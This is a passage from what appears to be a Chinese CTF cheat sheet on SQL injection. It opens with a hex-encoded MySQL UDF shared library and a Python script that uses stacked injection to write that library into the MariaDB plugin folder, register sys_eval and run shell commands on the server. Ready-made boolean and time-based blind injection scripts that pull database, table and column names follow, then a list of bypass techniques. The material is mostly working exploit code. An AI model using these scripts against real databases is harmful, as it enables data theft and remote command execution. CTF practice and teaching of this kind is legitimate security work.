00000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400'
codes=[]
for i in range(0,len(code),128):
	codes.append(code[i:min(i+128,len(code))])

#建临时表
#sql='''create table temp(data longblob)'''
#payload='''0';{};-- A'''.format(sql)
#requests.get(url+payload)

#清空临时表
sql='''delete from temp'''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#插入第一段数据
sql='''insert into temp(data) values (0x{})'''.format(codes[0])
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#更新连接剩余数据
for k in range(1,len(codes)):
	sql='''update temp set data = concat(data,0x{})'''.format(codes[k])
	payload='''0';{};-- A'''.format(sql)
	requests.get(url+payload)

#10.3.18-MariaDB	
#写入so文件
sql='''select data from temp into dumpfile '/usr/lib/mariadb/plugin/udf.so\''''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#引入自定义函数
sql='''create function sys_eval returns string soname 'udf.so\''''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#命令执行，结果更新到界面
sql='''update ctfshow_user set pass=(select sys_eval('cat /flag.her?'))'''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#查看结果
r=requests.get(url[:-4]+'?page=1&limit=10')
print(r.text)

SQLite3

内置表：select name,sql from sqlite_master

NoSQL

MongoDB
MongoDB 注入指北

常用脚本

布尔盲注

import string
import requests
dic='{}-_'+string.digits+string.ascii_lowercase

url='xxxxxxx'
now=''
for i in range(1,50):
	flag=0
	for j in dic:
		payload='''xxxxxxx'''.format()
		#print(payload)
		data={'username':payload,'password':'xxxxx'}
		r=requests.post(url,data=data)
		#print(r.text)
		if 'xxx' in r.text:
			now+=j
			print(now)
			flag=1
			break
	if flag==0:
		break

import requests

url = "xxx"

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        payload = f'if(ascii(substr((select(database())),{i},1))>{mid},1,0)'
        # payload = f'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema="ctfshow")),{i},1))>{mid},1,0)'
        # payload = f'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema="ctfshow")),{i},1))>{mid},1,0)%23'
        # payload = f'if(ascii(substr((select(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0)%23'
        data = {
            'id': f"100')||{payload}||('0"
        }
        r = requests.get(url,params=data)
        # r = requests.post(url,data=data)
        if "xxx" in r.text:
            head = mid + 1
        else:
            tail = mid

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

时间盲注

import requests
import string
import time

dic='{}-_,'+string.ascii_lowercase+string.digits

url='xxxxxx'
now=''
for i in range(1,50):
	flag=0
	for j in dic:
		a=time.time()
		payload='''xxxxxx'''.format()
		data={'ip':payload,"debug":0}
		r=requests.post(url,data=data)
		b=time.time()
		if b-a>1:
			now+=j
			flag=1
			print(now)
			break
	if flag==0:
		break

import requests

url = "http://xxx/?id=1%22and%20"

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # payload = f'if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema="yyy")),{i},1))>{mid},sleep(0.6),0)%23'
        # payload = f'if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_schema="yyy")),{i},1))>{mid},sleep(0.6),0)%23'
        payload = f'if(ascii(substr((select/**/group_concat(xxx)from(yyy.zzz)),{i},1))>{mid},sleep(0.6),0)%23'

        try:
            # data = {
        	#    'uname':f"admin')and {payload}#",
        	#    'passwd': '1'
        	# }
            r = requests.get(url + payload,timeout=0.5)
            # r = requests.post(url, data=data, timeout=0.5)
            tail = mid
        except:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

SQL注入

万能密码

手注

正常注入步骤（联合查询）

无回显

盲注

布尔盲注

时间盲注

报错注入

limit注入

update注入

insert注入

order by注入

group by注入

宽字节注入

堆叠注入

二次注入

二次urldecode注入

文件操作

Rogue Mysql Server

Quine

绕过（bypass）

空格

单双引号

逗号

等号

and / or

union

select

limit

where

information_schema

as

if

其他关键字

括号

数字

mysql系统库

sys系统库

无列名注入（or / column 被过滤）

参考文

DNS带外注入（OOB）

UDF

SQLite3

NoSQL

MongoDB

常用脚本

布尔盲注

时间盲注